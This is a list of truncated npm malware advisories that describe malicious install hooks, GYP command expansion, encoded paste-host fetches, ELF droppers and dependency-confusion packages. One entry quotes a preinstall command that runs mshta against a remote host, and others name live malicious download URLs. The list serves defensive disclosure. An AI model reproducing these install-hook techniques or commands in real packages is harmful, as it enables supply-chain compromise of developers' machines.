53 matches found
Malicious code in poly-kelly (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3d3df5266b6e9d9347844e4e054ab744aad9517c6f55df4e68e6c6815e843da7 On npm install, the package's postinstall script reads the homepage field from package.json set to...
MAL-2026-6544 Malicious code in chai-as-persisted (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5cf9c49450e0fa0d47be1b6ae27991f844868ff6c435d2082948b5feae862709 The package's postinstall script npm run smoke:pino executes index.js, which spawns a detached node lib/initializeCaller.js child. That module hides...
Malicious code in prism-silq (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6bb3e8b0ded57991e21f137aac7c905348a83f6be7914c4da619c18d2acd280c The package ships a binding.gyp whose sources field uses GYP command-expansion syntax !... at line 6. npm implicitly runs node-gyp rebuild whenever a...
MAL-2026-6493 Malicious code in prism-silq (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6bb3e8b0ded57991e21f137aac7c905348a83f6be7914c4da619c18d2acd280c The package ships a binding.gyp whose sources field uses GYP command-expansion syntax !... at line 6. npm implicitly runs node-gyp rebuild whenever a...
Malicious code in set-proto-chain (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bdb11eef3afbfc268bd48a18737884246861c7ae9e6a3d29901ae1379216c633 lib/index.js contains a base64-encoded URL decoding to https://jsonkeeper.com/b/BN77K, an anonymous mutable paste host that is fetched via axios.get;...
Malicious code in metrics-probe-dc85 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector aaa3316d23c1a348fb5c68a36eb775ca51f90d0e44973508dd5a8ba5a139e932 On install, package.json declares postinstall: node run.js, which auto-executes run.js when the package is installed. run.js imports os, fs, http,...
Malicious code in aillmgen (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341 On npm install, the package's preinstall hook preinstall.js runs exec'cmd /c "mshta http://fixars.top"', invoking the Windows mshta.exe binary to fet...
Malicious code in npm-sandbox-research-d7e8 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3ff31cbf7e2e36cef422933472638912cd6ee6652ece9b03d11faa98b70d13e9 Package declares a postinstall lifecycle hook "postinstall": "node run.js" that auto-executes on install. The package ships beacon scripts beacon12.j...
Malicious code in fhirproxy (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 96e092973bad8e995bdec34000e45943e0be59996e84f181ee4bee9cd423f8eb [email protected] is a thin loader package whose only behavior is to pull and execute the dependency fhirproxy-utils. package.json declares both...
MAL-2026-5455 Malicious code in uipath-sugar-sell (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 70cd5d70323e92395a2ea8f61a4089f1cca94e4bb81a7cad1375ae47d3461e6f Package [email protected] exhibits the canonical dependency-confusion shape: an internal-sounding name targeting a UiPath/SugarSell namespace,...
MAL-2026-5239 Malicious code in awaitly-visualizer (npm)
--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security a6c7977dbc054cdb7fe56da0d2fbd26e2a6fed695deb4263ccbf4adfedd86acb The Miasma malware is a self-propagating worm that spreads across the npm registry by abusing weaponized binding.gyp files to achieve...
Malicious code in awaitly (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a3b437ec90b9b48314676b67f08b3ab9a54e1d3b787aa17d668dd0459f2cf68b The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...
MAL-2026-5248 Malicious code in eslint-plugin-executable-stories-playwright (npm)
--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security a6c7977dbc054cdb7fe56da0d2fbd26e2a6fed695deb4263ccbf4adfedd86acb The Miasma malware is a self-propagating worm that spreads across the npm registry by abusing weaponized binding.gyp files to achieve...
Malicious code in autotel-mcp-instrumentation (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d430094afb9dc367c9a2a0477eea7bba4074cf3eed9f6f2861a0e82f79706ee4 No concrete installer-harm signals were identified for this package version. No lifecycle hooks, network destinations, credential reads, or other...
Malicious code in node-env-resolver-vite (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ebb20ec41cd318dc4b8958df0ddc5c86e5fede7c4ee3c7ced1439aad3e943b97 The package was found to contain malicious code or consuming dependency that contains malicious code Source: google-open-source-security...
MAL-2026-4808 Malicious code in wm-idp-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d2acf2a0d94ec1d2bada80f3251f5ecbea64d78ffadcab2b997b9708c2ae71cd package.json declares "node-fetch": "https://registry.ctzbg.com/wm-idp-sdk/node-fetch" — a direct HTTPS tarball URL hosted on a domain...
Malicious code in arnext-arkb (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 87f9eda6644870362103de6f3bf1877efb1039c4b2b771343bcf6c38f216ecc0 package.json declares "preinstall": "./bin/install-deps", which points at a 976,568-byte Linux x86-64 ELF executable shipped in the tarball with no...
MAL-2026-4483 Malicious code in arnext-arkb (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 87f9eda6644870362103de6f3bf1877efb1039c4b2b771343bcf6c38f216ecc0 package.json declares "preinstall": "./bin/install-deps", which points at a 976,568-byte Linux x86-64 ELF executable shipped in the tarball with no...
Malicious code in weavedb-offchain (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d267c34e35dca7091a9ab01d22a9c0a4cfde364531b8017f15f4a09785381198 package.json declares scripts.preinstall: "./.github/scripts/precheck", where precheck is a 976,568-byte stripped Linux ELF binary sha256...
MAL-2026-4566 Malicious code in fpjson-lang (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 38aca097f261c15ef9901f259883679e2d4308d6e4053099643c8befe9a14318 package.json declares "preinstall": "./bin/install-deps", causing npm to execute a 954KB packed Linux ELF binary on every install. The package...